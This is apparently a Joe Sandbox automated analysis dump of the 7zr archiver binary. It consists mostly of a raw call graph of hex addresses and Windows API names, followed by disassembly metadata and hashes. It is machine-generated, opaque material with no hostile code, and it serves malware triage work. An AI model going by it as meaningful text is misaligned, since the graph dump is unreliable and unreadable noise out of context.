a05696 73877->73878 74011 a13333 malloc _CxxThrowException free 73878->74011 73880 a056a2 73881 a056ad 73880->73881 73883 a056c5 73880->73883 74012 a07853 5 API calls 2 library calls 73881->74012 73884 a056b4 73883->73884 74013 9f4adf wcscmp 73883->74013 73885 a05707 73884->73885 74015 9f1089 malloc _CxxThrowException free _CxxThrowException 73884->74015 74016 9f31e5 malloc _CxxThrowException free _CxxThrowException 73885->74016 73889 a056d2 73889->73884 74014 a07853 5 API calls 2 library calls 73889->74014 73890 a05712 74017 9f1e40 free 73890->74017 73893->73666 74018 9f2ba6 73894->74018 73898 a058c8 __EH_prolog 73897->73898 73899 9f2e04 2 API calls 73898->73899 73900 a058e9 73899->73900 74021 9f6c72 73900->74021 73976->73668 73977->73673 73978->73674 73979->73692 73980->73711 73984->73685 73985->73702 73988->73720 74005->73699 74006->73718 74007->73869 74008->73871 74009->73862 74010->73876 74011->73880 74012->73884 74013->73889 74014->73884 74015->73885 74016->73890 74017->73893 74019 9f1e0c ctype malloc _CxxThrowException 74018->74019 74020 9f2bbb 74019->74020 74020->73671 74023 9f6c7c __EH_prolog 74021->74023 74164->73781 74165->73774 74166->73774 74167 9f42d1 74168 9f42bd 74167->74168 74169 9f1e0c ctype 2 API calls 74168->74169 74170 9f42c5 74168->74170 74169->74170 74171 a2a42c 74172 a2a435 fputs 74171->74172 74173 a2a449 74171->74173 74329 9f1fa0 fputc 74172->74329 74330 a2545d 74173->74330 74177 9f2e04 2 API calls 74178 a2a4a1 74177->74178 74334 a11858 74178->74334 74180 a2a4c9 74396 9f1e40 free 74180->74396 74182 a2a4d8 74183 a2a4ee 74182->74183 74397 a2c7d7 74182->74397 74185 a2a50e 74183->74185 74405 a257fb 74183->74405 74415 a2c73e 74185->74415 74190 a2ac17 74593 a22db9 free ctype 74190->74593 74191 9f1e0c ctype 2 API calls 74193 a2a53a 74191->74193 74195 a2a54d 74193->74195 74551 a2b0fa malloc _CxxThrowException __EH_prolog 74193->74551 74194 a2ac23 74196 a2ac3a 74194->74196 74198 a2ac35 74194->74198 74200 9f2fec 3 API calls 74195->74200 74595 a2b96d 
_CxxThrowException 74196->74595 74594 a2b988 33 API calls __aulldiv 74198->74594 74207 a2a586 74200->74207 74202 a2ac42 74596 9f1e40 free 74202->74596 74204 a2ac4d 74597 a13247 74204->74597 74433 a2ad06 74207->74433 74211 a2ac7d 74604 9f11c2 free __EH_prolog ctype 74211->74604 74215 a2ac89 74605 a2be0c free __EH_prolog ctype 74215->74605 74219 a2ac98 74606 a22db9 free ctype 74219->74606 74220 9f2e04 2 API calls 74222 a2a636 74220->74222 74451 a14345 74222->74451 74225 a2aca4 74306 a2aae5 74592 a22db9 free ctype 74306->74592 74329->74173 74331 a25473 74330->74331 74332 a25466 74330->74332 74331->74177 74607 9f275e malloc _CxxThrowException free ctype 74332->74607 74335 a11862 __EH_prolog 74334->74335 74608 a1021a 74335->74608 74340 a118b9 74622 a11aa5 free __EH_prolog ctype 74340->74622 74342 a11935 74633 a11aa5 free __EH_prolog ctype 74342->74633 74343 a118c7 74623 a22db9 free ctype 74343->74623 74346 a11944 74368 a11966 74346->74368 74634 a11d73 5 API calls __EH_prolog 74346->74634 74348 a118d3 74348->74180 74351 a11958 _CxxThrowException 74351->74368 74353 a119be 74641 a1f1f1 malloc _CxxThrowException free _CxxThrowException 74353->74641 74354 9f2e04 2 API calls 74354->74368 74355 a118db 74355->74342 74624 a10144 malloc _CxxThrowException free _CxxThrowException 74355->74624 74625 a304d2 74355->74625 74631 9f1524 malloc _CxxThrowException __EH_prolog ctype 74355->74631 74632 9f1e40 free 74355->74632 74358 a119d6 74360 a17ebb free 74358->74360 74361 a119e1 74360->74361 74363 a012d4 4 API calls 74361->74363 74362 a304d2 5 API calls 74362->74368 74364 a119ea 74363->74364 74365 a17ebb free 74364->74365 74367 a119f7 74365->74367 74369 a012d4 4 API calls 74367->74369 74368->74353 74368->74354 74368->74362 74635 9f631f 74368->74635 74639 9f1524 malloc _CxxThrowException __EH_prolog ctype 74368->74639 74640 9f1e40 free 74368->74640 74375 a119ff 74369->74375 74371 a11a4f 74643 9f1e40 free 74371->74643 74372 9f1524 malloc _CxxThrowException 74372->74375 74374 a11a57 74644 
a22db9 free ctype 74374->74644 74375->74371 74375->74372 74380 a11a83 74375->74380 74642 9f42e3 CharUpperW 74375->74642 74377 a11a64 74645 a22db9 free ctype 74377->74645 74646 a11d73 5 API calls __EH_prolog 74380->74646 74382 a11a97 _CxxThrowException 74383 a11aa5 __EH_prolog 74382->74383 74647 9f1e40 free 74383->74647 74385 a11ac8 74648 a102e8 free ctype 74385->74648 74387 a11ad1 74649 a11eab free __EH_prolog ctype 74387->74649 74389 a11add 74650 9f1e40 free 74389->74650 74391 a11ae5 74651 9f1e40 free 74391->74651 74393 a11aed 74652 a22db9 free ctype 74393->74652 74395 a11afa 74395->74180 74396->74182 74398 a2c849 74397->74398 74400 a2c7ea 74397->74400 74399 a2c85a 74398->74399 74838 9f1f91 fflush 74398->74838 74399->74183 74401 a2c7fe fputs 74400->74401 74837 9f25cb malloc _CxxThrowException free _CxxThrowException ctype 74400->74837 74401->74398 74406 a25805 __EH_prolog 74405->74406 74407 a25847 74406->74407 74839 9f26dd 74406->74839 74407->74185 74413 a2583f 74859 9f1e40 free 74413->74859 74416 a2c748 __EH_prolog 74415->74416 74417 a2c7d7 ctype 6 API calls 74416->74417 74418 a2c75d 74417->74418 74898 9f1e40 free 74418->74898 74420 a2c768 74899 a12c0b 74420->74899 74424 a2c77d 74905 9f1e40 free 74424->74905 74426 a2c785 74906 9f1e40 free 74426->74906 74428 a2c78d 74907 9f1e40 free 74428->74907 74430 a2c795 74431 a12c0b ctype free 74430->74431 74432 a2a51d 74431->74432 74432->74191 74432->74306 74910 a2ad29 74433->74910 74436 a2bf3e 74437 9f2fec 3 API calls 74436->74437 74438 a2bf85 74437->74438 74439 9f2fec 3 API calls 74438->74439 74440 a2a5ee 74439->74440 74441 a03a29 74440->74441 74442 a03a3b 74441->74442 74448 a03a37 74441->74448 74916 a03bd9 free ctype 74442->74916 74444 a03a42 74445 a03a6f 74444->74445 74446 a03a52 _CxxThrowException 74444->74446 74447 a03a67 74444->74447 74445->74448 74918 a03b76 malloc _CxxThrowException __EH_prolog ctype 74445->74918 74446->74447 74917 a30551 malloc _CxxThrowException free memcpy ctype 74447->74917 74448->74220 74452 
a1434f __EH_prolog 74451->74452 74453 9f2e04 2 API calls 74452->74453 74454 a1436d 74453->74454 74455 9f2e04 2 API calls 74454->74455 74551->74195 74592->74190 74593->74194 74594->74196 74595->74202 74596->74204 74598 a1324e 74597->74598 74599 a13260 74598->74599 75841 9f1e40 free 74598->75841 75840 9f1e40 free 74599->75840 74602 a13267 74603 9f1e40 free 74602->74603 74603->74211 74604->74215 74605->74219 74606->74225 74607->74331 74609 a10224 __EH_prolog 74608->74609 74653 a03d66 74609->74653 74612 a1062e 74618 a10638 __EH_prolog 74612->74618 74613 a106de 74740 a1019a malloc _CxxThrowException free memcpy 74613->74740 74615 a106e6 74741 a11453 26 API calls 2 library calls 74615->74741 74616 a101bc malloc _CxxThrowException free _CxxThrowException memcpy 74616->74618 74618->74613 74618->74616 74621 a106ee 74618->74621 74669 a10703 74618->74669 74739 a22db9 free ctype 74618->74739 74621->74340 74621->74355 74622->74343 74623->74348 74624->74355 74626 a30513 74625->74626 74627 a304df 74625->74627 74626->74355 74628 a304e8 _CxxThrowException 74627->74628 74629 a304fd 74627->74629 74628->74629 74780 a30551 malloc _CxxThrowException free memcpy ctype 74629->74780 74631->74355 74632->74355 74633->74346 74634->74351 74636 9f9245 74635->74636 74781 9f90da 74636->74781 74639->74368 74640->74368 74641->74358 74642->74375 74643->74374 74644->74377 74645->74348 74646->74382 74647->74385 74648->74387 74649->74389 74650->74391 74651->74393 74652->74395 74664 a8fb10 74653->74664 74655 a03d70 GetCurrentProcess 74665 a03e04 74655->74665 74657 a03d8d OpenProcessToken 74658 a03de3 74657->74658 74659 a03d9e LookupPrivilegeValueW 74657->74659 74661 a03e04 CloseHandle 74658->74661 74659->74658 74660 a03dc0 AdjustTokenPrivileges 74659->74660 74660->74658 74662 a03dd5 GetLastError 74660->74662 74663 a03def 74661->74663 74662->74658 74663->74612 74664->74655 74666 a03e11 CloseHandle 74665->74666 74667 a03e0d 74665->74667 74668 a03e21 74666->74668 74667->74657 74668->74657 74695 a1070d 
__EH_prolog 74669->74695 74670 a10e1d 74777 a10416 18 API calls 2 library calls 74670->74777 74672 a10ea6 74779 a3ec78 free ctype 74672->74779 74673 a10d11 74771 9f7496 7 API calls 2 library calls 74673->74771 74676 a10c13 74768 9f1e40 free 74676->74768 74678 9f2da9 2 API calls 74678->74695 74680 a10c83 74680->74670 74680->74673 74681 a10b40 74681->74618 74682 a10de0 74773 a22db9 free ctype 74682->74773 74683 9f2da9 2 API calls 74704 a10ab5 74683->74704 74684 a10e47 74684->74672 74778 a1117d 68 API calls 2 library calls 74684->74778 74685 9f2f1c 2 API calls 74697 a10d29 74685->74697 74688 9f2e04 2 API calls 74688->74695 74689 9f2e04 2 API calls 74689->74704 74692 a10e02 74776 a22db9 free ctype 74692->74776 74694 9f2e04 2 API calls 74694->74697 74695->74678 74695->74680 74695->74681 74695->74688 74698 9f2fec 3 API calls 74695->74698 74695->74704 74711 a10b26 74695->74711 74732 a10b48 74695->74732 74734 a22db9 free ctype 74695->74734 74735 a304d2 malloc _CxxThrowException free _CxxThrowException memcpy 74695->74735 74736 9f1524 malloc _CxxThrowException 74695->74736 74737 9f1e40 free ctype 74695->74737 74742 9f2f4a malloc _CxxThrowException free ctype 74695->74742 74743 9f1089 malloc _CxxThrowException free _CxxThrowException 74695->74743 74744 a113eb 5 API calls 2 library calls 74695->74744 74745 a1050b 74695->74745 74750 a10021 GetLastError 74695->74750 74751 9f49bd 9 API calls 2 library calls 74695->74751 74752 a10306 12 API calls 74695->74752 74753 a0ff00 5 API calls 2 library calls 74695->74753 74754 a1057d 16 API calls 2 library calls 74695->74754 74755 a10f8e 24 API calls 2 library calls 74695->74755 74756 9f472e CharUpperW 74695->74756 74757 a08984 malloc _CxxThrowException free _CxxThrowException memcpy 74695->74757 74758 a10ef4 68 API calls 2 library calls 74695->74758 74697->74682 74697->74685 74697->74694 74702 9f2fec 3 API calls 74697->74702 74710 a10df3 74697->74710 74712 9f1e40 free ctype 74697->74712 74715 a10df8 74697->74715 74772 a1117d 68 API calls 
2 library calls 74697->74772 74698->74695 74702->74697 74703 9f2fec 3 API calls 74703->74704 74704->74676 74704->74683 74704->74689 74704->74703 74708 a1050b 44 API calls 74704->74708 74717 a10c79 74704->74717 74720 9f1e40 free ctype 74704->74720 74759 9f2f4a malloc _CxxThrowException free ctype 74704->74759 74764 9f1089 malloc _CxxThrowException free _CxxThrowException 74704->74764 74765 a113eb 5 API calls 2 library calls 74704->74765 74766 a10ef4 68 API calls 2 library calls 74704->74766 74767 a22db9 free ctype 74704->74767 74769 a10021 GetLastError 74704->74769 74708->74704 74774 9f1e40 free 74710->74774 74760 9f1e40 free 74711->74760 74712->74697 74775 9f1e40 free 74715->74775 74770 9f1e40 free 74717->74770 74718 a10b30 74761 9f1e40 free 74718->74761 74720->74704 74723 a10b38 74762 9f1e40 free 74723->74762 74763 a22db9 free ctype 74732->74763 74734->74695 74735->74695 74736->74695 74737->74695 74739->74618 74740->74615 74741->74621 74742->74695 74743->74695 74744->74695 74746 9f6c72 44 API calls 74745->74746 74749 a1051e 74746->74749 74747 a10575 74747->74695 74748 9f2f88 3 API calls 74748->74747 74749->74747 74749->74748 74750->74695 74751->74695 74752->74695 74753->74695 74754->74695 74755->74695 74756->74695 74757->74695 74758->74695 74759->74704 74760->74718 74761->74723 74762->74681 74763->74711 74764->74704 74765->74704 74766->74704 74767->74704 74768->74681 74769->74704 74770->74680 74771->74697 74772->74697 74773->74681 74774->74715 74775->74692 74776->74681 74777->74684 74778->74684 74779->74681 74780->74626 74782 9f90e4 __EH_prolog 74781->74782 74783 9f2f88 3 API calls 74782->74783 74785 9f90f7 74783->74785 74784 9f915d 74786 9f2e04 2 API calls 74784->74786 74785->74784 74790 9f9109 74785->74790 74787 9f9165 74786->74787 74788 9f91be 74787->74788 74792 9f9174 74787->74792 74831 9f6332 6 API calls 2 library calls 74788->74831 74791 9f9155 74790->74791 74822 9f2e47 74790->74822 74791->74368 74793 9f2f88 3 API calls 74792->74793 74794 9f917d 74793->74794 
74819 9f91ca 74794->74819 74829 9f859e malloc _CxxThrowException free _CxxThrowException 74794->74829 74796 9f9122 74826 9f8f57 memmove 74796->74826 74799 9f912e 74802 9f914d 74799->74802 74827 9f31e5 malloc _CxxThrowException free _CxxThrowException 74799->74827 74801 9f9185 74805 9f2e04 2 API calls 74801->74805 74828 9f1e40 free 74802->74828 74806 9f9197 74805->74806 74807 9f919f 74806->74807 74808 9f91ce 74806->74808 74810 9f91b9 74807->74810 74830 9f1089 malloc _CxxThrowException free _CxxThrowException 74807->74830 74809 9f2f88 3 API calls 74808->74809 74809->74810 74832 9f3199 malloc _CxxThrowException free _CxxThrowException 74810->74832 74813 9f91e6 74833 9f8f57 memmove 74813->74833 74815 9f91ee 74816 9f91f2 74815->74816 74818 9f2fec 3 API calls 74815->74818 74835 9f1e40 free 74816->74835 74820 9f9212 74818->74820 74836 9f1e40 free 74819->74836 74834 9f31e5 malloc _CxxThrowException free _CxxThrowException 74820->74834 74823 9f2e57 74822->74823 74824 9f2ba6 2 API calls 74823->74824 74825 9f2e6a 74824->74825 74825->74796 74825->74825 74826->74799 74827->74802 74828->74791 74829->74801 74830->74810 74831->74794 74832->74813 74833->74815 74834->74816 74835->74819 74836->74791 74837->74401 74838->74399 74840 9f1e0c ctype 2 API calls 74839->74840 74841 9f26ea 74840->74841 74842 a25678 74841->74842 74843 a256b1 74842->74843 74844 a25689 74842->74844 74860 a25593 74843->74860 74846 a25593 6 API calls 74844->74846 74848 a256a5 74846->74848 74874 9f28a1 74848->74874 74852 a2570e fputs 74858 9f1fa0 fputc 74852->74858 74854 a256ef 74855 a25593 6 API calls 74854->74855 74856 a25701 74855->74856 74857 a25711 6 API calls 74856->74857 74857->74852 74858->74413 74859->74407 74861 a255ad 74860->74861 74862 9f28a1 5 API calls 74861->74862 74863 a255b8 74862->74863 74879 9f286d 74863->74879 74866 9f28a1 5 API calls 74867 a255c7 74866->74867 74868 a25711 74867->74868 74869 a25721 74868->74869 74870 a256e0 74868->74870 74871 9f28a1 5 API calls 74869->74871 74870->74852 74878 
9f2881 malloc _CxxThrowException free memcpy _CxxThrowException 74870->74878 74872 a2572b 74871->74872 74887 a255cd 6 API calls 74872->74887 74875 9f28b0 74874->74875 74888 9f267f 74875->74888 74877 9f28bf 74877->74843 74878->74854 74882 9f1e9d 74879->74882 74883 9f1ead 74882->74883 74884 9f1ea8 74882->74884 74883->74866 74886 9f263c malloc _CxxThrowException free memcpy _CxxThrowException 74884->74886 74886->74883 74887->74870 74889 9f26c2 74888->74889 74891 9f2693 74888->74891 74889->74877 74890 9f26c8 _CxxThrowException 74893 9f26dd 74890->74893 74891->74890 74892 9f26bc 74891->74892 74897 9f2595 malloc _CxxThrowException free memcpy ctype 74892->74897 74894 9f1e0c ctype 2 API calls 74893->74894 74896 9f26ea 74894->74896 74896->74877 74897->74889 74898->74420 74908 9f1e40 free 74899->74908 74901 a12c16 74909 9f1e40 free 74901->74909 74903 a12c1e 74904 9f1e40 free 74903->74904 74904->74424 74905->74426 74906->74428 74907->74430 74908->74901 74909->74903 74911 a2ad33 __EH_prolog 74910->74911 74912 9f2e04 2 API calls 74911->74912 74913 a2ad5f 74912->74913 74914 9f2e04 2 API calls 74913->74914 74915 a2a5d8 74914->74915 74915->74436 74916->74444 74917->74445 74918->74445 75840->74602 75841->74598 75842 a38eb1 75847 a38ed1 75842->75847 75845 a38ec9 75848 a38edb __EH_prolog 75847->75848 75856 a39267 75848->75856 75852 a38efd 75861 a2e5f1 free ctype 75852->75861 75854 a38eb9 75854->75845 75855 9f1e40 free 75854->75855 75855->75845 75857 a39271 __EH_prolog 75856->75857 75862 9f1e40 free 75857->75862 75859 a38ef1 75860 a3922b free CloseHandle GetLastError ctype 75859->75860 75860->75852 75861->75854 75862->75859 75863 a2adb7 75864 a2adc1 __EH_prolog 75863->75864 75865 9f26dd 2 API calls 75864->75865 75866 a2ae1d 75865->75866 75867 9f2e04 2 API calls 75866->75867 75868 a2ae38 75867->75868 75869 9f2e04 2 API calls 75868->75869 75870 a2ae44 75869->75870 75871 9f2e04 2 API calls 75870->75871 75872 a2ae68 75871->75872 75873 a2ad29 2 API calls 75872->75873 75874 a2ae85 
75873->75874 75879 a2af2d 75874->75879 75876 a2ae94 75877 9f2e04 2 API calls 75876->75877 75878 a2aeb2 75877->75878 75880 a2af37 __EH_prolog 75879->75880 75891 a034f4 malloc _CxxThrowException __EH_prolog 75880->75891 75882 a2afac 75883 9f2e04 2 API calls 75882->75883 75884 a2afbb 75883->75884 75885 9f2e04 2 API calls 75884->75885 75886 a2afca 75885->75886 75887 9f2e04 2 API calls 75886->75887 75888 a2afd9 75887->75888 75889 9f2e04 2 API calls 75888->75889 75890 a2afe8 75889->75890 75890->75876 75891->75882 75895 a25475 75896 9f2fec 3 API calls 75895->75896 75897 a254b4 75896->75897 75898 a2c911 24 API calls 75897->75898 75899 a254bb 75898->75899 75900 a769f0 free 75901 a8ffb1 __setusermatherr 75902 a8ffbd 75901->75902 75907 a90068 _controlfp 75902->75907 75904 a8ffc2 _initterm __getmainargs _initterm __p___initenv 75905 a2c27c 75904->75905 75906 a9001d exit _XcptFilter 75905->75906 75907->75904 75908 a1cefb 75909 a1cf03 75908->75909 75937 a1d0cc 75908->75937 75909->75937 75955 a1cae9 VariantClear 75909->75955 75911 a1cf59 75911->75937 75956 a1cae9 VariantClear 75911->75956 75913 a1cf71 75913->75937 75957 a1cae9 VariantClear 75913->75957 75915 a1cf87 75915->75937 75958 a1cae9 VariantClear 75915->75958 75917 a1cf9d 75917->75937 75959 a1cae9 VariantClear 75917->75959 75919 a1cfb3 75919->75937 75960 a1cae9 VariantClear 75919->75960 75921 a1cfc9 75921->75937 75961 9f4504 malloc _CxxThrowException 75921->75961 75923 a1cfdc 75924 9f2e04 2 API calls 75923->75924 75926 a1cfe7 75924->75926 75925 a1d009 75929 a1d080 75925->75929 75930 a1d030 75925->75930 75949 a1d07b 75925->75949 75926->75925 75927 9f2f88 3 API calls 75926->75927 75927->75925 75966 a17a0c CharUpperW 75929->75966 75933 9f2e04 2 API calls 75930->75933 75931 a1d0c4 75970 9f1e40 free 75931->75970 75936 a1d038 75933->75936 75935 a1d08b 75967 a0fdbc 4 API calls 2 library calls 75935->75967 75938 9f2e04 2 API calls 75936->75938 75940 a1d046 75938->75940 75962 a0fdbc 4 API calls 2 library calls 75940->75962 75941 
a1d0a7 75943 9f2fec 3 API calls 75941->75943 75945 a1d0b3 75943->75945 75944 a1d057 75946 9f2fec 3 API calls 75944->75946 75968 9f1e40 free 75945->75968 75948 a1d063 75946->75948 75963 9f1e40 free 75948->75963 75969 9f1e40 free 75949->75969 75951 a1d06b 75964 9f1e40 free 75951->75964 75953 a1d073 75965 9f1e40 free 75953->75965 75955->75911 75956->75913 75957->75915 75958->75917 75959->75919 75960->75921 75961->75923 75962->75944 75963->75951 75964->75953 75965->75949 75966->75935 75967->75941 75968->75949 75969->75931 75970->75937 75971 9fb144 75972 9fb153 75971->75972 75974 9fb159 75971->75974 75973 a011b4 107 API calls 75972->75973 75973->75974 75975 a2993d 76059 a2b5b1 75975->76059 75978 a29963 76065 a01f33 75978->76065 75979 9f1fb3 11 API calls 75979->75978 75981 a29975 75982 a299b7 GetStdHandle GetConsoleScreenBufferInfo 75981->75982 75983 a299ce 75981->75983 75982->75983 75984 9f1e0c ctype 2 API calls 75983->75984 75985 a299dc 75984->75985 76186 a17b48 75985->76186 75987 a29a29 76203 a2b96d _CxxThrowException 75987->76203 75989 a29a30 76204 a17018 8 API calls 2 library calls 75989->76204 75991 a29a7c 76205 a1ddb5 6 API calls 2 library calls 75991->76205 75992 a29a66 _CxxThrowException 75992->75991 75994 a29aa6 75996 a29aaa _CxxThrowException 75994->75996 76004 a29ac0 75994->76004 75995 a29a37 75995->75991 75995->75992 75996->76004 75997 a29b3a 76209 9f1fa0 fputc 75997->76209 75999 a29bfa _CxxThrowException 76014 a29be6 75999->76014 76001 a29b63 fputs 76210 9f1fa0 fputc 76001->76210 76004->75997 76004->75999 76206 a17dd7 7 API calls 2 library calls 76004->76206 76207 a2c077 6 API calls 76004->76207 76208 9f1e40 free 76004->76208 76005 a29b79 strlen strlen 76007 a29e25 76005->76007 76008 a29baa fputs fputc 76005->76008 76218 9f1fa0 fputc 76007->76218 76008->76014 76010 a29e2c fputs 76219 9f1fa0 fputc 76010->76219 76012 a29f0c 76224 9f1fa0 fputc 76012->76224 76014->76007 76014->76008 76018 a2b67d 12 API calls 76014->76018 76023 9f2e04 2 API calls 76014->76023 
76036 a29d2a fputs 76014->76036 76042 a29d5f fputs 76014->76042 76043 9f31e5 malloc _CxxThrowException free _CxxThrowException 76014->76043 76211 9f21d8 fputs 76014->76211 76212 9f315e malloc _CxxThrowException free _CxxThrowException 76014->76212 76213 9f3221 malloc _CxxThrowException free _CxxThrowException 76014->76213 76214 9f1089 malloc _CxxThrowException free _CxxThrowException 76014->76214 76216 9f1fa0 fputc 76014->76216 76217 9f1e40 free 76014->76217 76016 a29f13 fputs 76225 9f1fa0 fputc 76016->76225 76018->76014 76020 a29f9f 76022 a2ac3a 76020->76022 76025 a2ac35 76020->76025 76231 a2b96d _CxxThrowException 76022->76231 76023->76014 76230 a2b988 33 API calls __aulldiv 76025->76230 76028 a2ac42 76232 9f1e40 free 76028->76232 76031 a2ac4d 76033 a13247 free 76031->76033 76034 a2ac5d 76033->76034 76233 9f1e40 free 76034->76233 76035 a29f29 76035->76020 76047 a29f77 fputs 76035->76047 76226 a2b650 fputc fputs fputs fputc 76035->76226 76227 a2b5e9 fputc fputs 76035->76227 76228 a2bde4 fputc fputs 76035->76228 76215 9f21d8 fputs 76036->76215 76041 a2ac7d 76234 9f11c2 free __EH_prolog ctype 76041->76234 76042->76014 76043->76014 76229 9f1fa0 fputc 76047->76229 76048 a2ac89 76053 a29ee0 fputs 76223 9f1fa0 fputc 76053->76223 76057 a29e42 76057->76012 76057->76053 76220 a2b650 fputc fputs fputs fputc 76057->76220 76221 9f21d8 fputs 76057->76221 76222 a2bde4 fputc fputs 76057->76222 76060 a2994a 76059->76060 76061 a2b5bc fputs 76059->76061 76060->75978 76060->75979 76237 9f1fa0 fputc 76061->76237 76063 a2b5d5 76063->76060 76064 a2b5d9 fputs 76063->76064 76064->76060 76066 a01f6c 76065->76066 76067 a01f4f 76065->76067 76238 a029eb 76066->76238 76270 a11d73 5 API calls __EH_prolog 76067->76270 76070 a01f5e _CxxThrowException 76070->76066 76072 a01fa3 76074 a01fbc 76072->76074 76076 9f4fc0 5 API calls 76072->76076 76077 a01fda 76074->76077 76078 9f2fec 3 API calls 76074->76078 76075 a01f95 _CxxThrowException 76075->76072 76076->76074 76079 a02022 wcscmp 76077->76079 
76088 a02036 76077->76088 76078->76077 76080 a020af 76079->76080 76079->76088 76272 a11d73 5 API calls __EH_prolog 76080->76272 76082 a020be _CxxThrowException 76082->76088 76083 a020a9 76273 a0393c 6 API calls 2 library calls 76083->76273 76085 a020f4 76274 a0393c 6 API calls 2 library calls 76085->76274 76087 a02108 76089 a02135 76087->76089 76275 a02e04 62 API calls 2 library calls 76087->76275 76088->76083 76091 a0219a 76088->76091 76097 a02159 76089->76097 76276 a02e04 62 API calls 2 library calls 76089->76276 76277 a11d73 5 API calls __EH_prolog 76091->76277 76094 a021a9 _CxxThrowException 76094->76097 76095 a0227f 76243 a02aa9 76095->76243 76096 a02245 76100 9f2fec 3 API calls 76096->76100 76097->76095 76097->76096 76278 a11d73 5 API calls __EH_prolog 76097->76278 76103 a0225c 76100->76103 76102 a02237 _CxxThrowException 76102->76096 76103->76095 76279 a11d73 5 API calls __EH_prolog 76103->76279 76104 a022d9 76106 a02302 76104->76106 76107 9f2fec 3 API calls 76104->76107 76105 9f2fec 3 API calls 76105->76104 76108 9f4fc0 5 API calls 76106->76108 76107->76106 76110 a02315 76108->76110 76261 a0384c 76110->76261 76111 a02271 _CxxThrowException 76111->76095 76113 a02322 76117 a026c6 76113->76117 76126 a023a1 76113->76126 76114 a028ce 76115 a0293a 76114->76115 76129 a028d5 76114->76129 76120 a029a5 76115->76120 76121 a0293f 76115->76121 76116 a02700 76293 a032ec 14 API calls 2 library calls 76116->76293 76117->76114 76117->76116 76292 a11d73 5 API calls __EH_prolog 76117->76292 76123 a029ae _CxxThrowException 76120->76123 76178 a0264d 76120->76178 76300 9f4eec 16 API calls 76121->76300 76122 a026f2 _CxxThrowException 76122->76116 76124 a02713 76130 a03a29 5 API calls 76124->76130 76127 a0247a wcscmp 76126->76127 76147 a0248e 76126->76147 76132 a024cf wcscmp 76127->76132 76127->76147 76129->76178 76299 a11d73 5 API calls __EH_prolog 76129->76299 76142 a02722 76130->76142 76131 a0294c 76301 9f4ea1 8 API calls 76131->76301 76137 a024ef wcscmp 76132->76137 
76132->76147 76134 a02953 76138 9f4fc0 5 API calls 76134->76138 76140 a0250f 76137->76140 76137->76147 76138->76178 76139 a02920 _CxxThrowException 76139->76178 76283 a11d73 5 API calls __EH_prolog 76140->76283 76144 a027cf 76142->76144 76146 9f2fec 3 API calls 76142->76146 76143 a0251e _CxxThrowException 76145 a0252c 76143->76145 76148 a02880 76144->76148 76153 a0281f 76144->76153 76295 a11d73 5 API calls __EH_prolog 76144->76295 76149 a02569 76145->76149 76284 a02e04 62 API calls 2 library calls 76145->76284 76150 a027a9 76146->76150 76147->76145 76280 9f4eec 16 API calls 76147->76280 76281 9f4ea1 8 API calls 76147->76281 76282 a11d73 5 API calls __EH_prolog 76147->76282 76151 a0289b 76148->76151 76158 9f2fec 3 API calls 76148->76158 76155 a0258c 76149->76155 76285 a02e04 62 API calls 2 library calls 76149->76285 76150->76144 76294 9f3563 memmove 76150->76294 76151->76178 76298 a11d73 5 API calls __EH_prolog 76151->76298 76153->76148 76159 a02847 76153->76159 76296 a11d73 5 API calls __EH_prolog 76153->76296 76161 a025a4 76155->76161 76286 a02a61 malloc _CxxThrowException free _CxxThrowException memcpy 76155->76286 76156 a024c1 _CxxThrowException 76156->76132 76158->76151 76159->76148 76297 a11d73 5 API calls __EH_prolog 76159->76297 76287 9f4eec 16 API calls 76161->76287 76162 a02811 _CxxThrowException 76162->76153 76168 a028c0 _CxxThrowException 76168->76114 76169 a02839 _CxxThrowException 76169->76159 76171 a025ad 76288 a11b07 49 API calls 76171->76288 76172 a02872 _CxxThrowException 76172->76148 76174 a025b4 76289 9f4ea1 8 API calls 76174->76289 76176 a025bb 76177 9f2fec 3 API calls 76176->76177 76180 a025d6 76176->76180 76177->76180 76178->75981 76179 a0261f 76179->76178 76181 9f2fec 3 API calls 76179->76181 76180->76178 76180->76179 76290 a11d73 5 API calls __EH_prolog 76180->76290 76183 a0263f 76181->76183 76291 9f859e malloc _CxxThrowException free _CxxThrowException 76183->76291 76184 a02611 _CxxThrowException 76184->76179 76187 a17b52 __EH_prolog 
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A381F1
                                      • Part of subcall function 00A3F749: _CxxThrowException.MSVCRT(?,00AA4A58), ref: 00A3F792
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: ExceptionH_prologThrow
                                    • String ID:
                                    • API String ID: 461045715-3916222277
                                    • Opcode ID: ec50288a6cc49e619038c1f7d702ba5d7383016e41edb54c1af8239d4fb653c7
                                    • Instruction ID: 661ec7fbe3d8ec5c984c787c26c40f0781f083dbe48772f1f98f037d8e774c44
                                    • Opcode Fuzzy Hash: ec50288a6cc49e619038c1f7d702ba5d7383016e41edb54c1af8239d4fb653c7
                                    • Instruction Fuzzy Hash: DB928E30900349DFDF15DFA8C984BAEBBB1BF58304F244099F815AB291CB79AE45CB61
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 009F686D
                                      • Part of subcall function 009F6848: FindClose.KERNELBASE(00000000,?,009F6880), ref: 009F6853
                                    • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 009F68A5
                                    • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 009F68DE
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
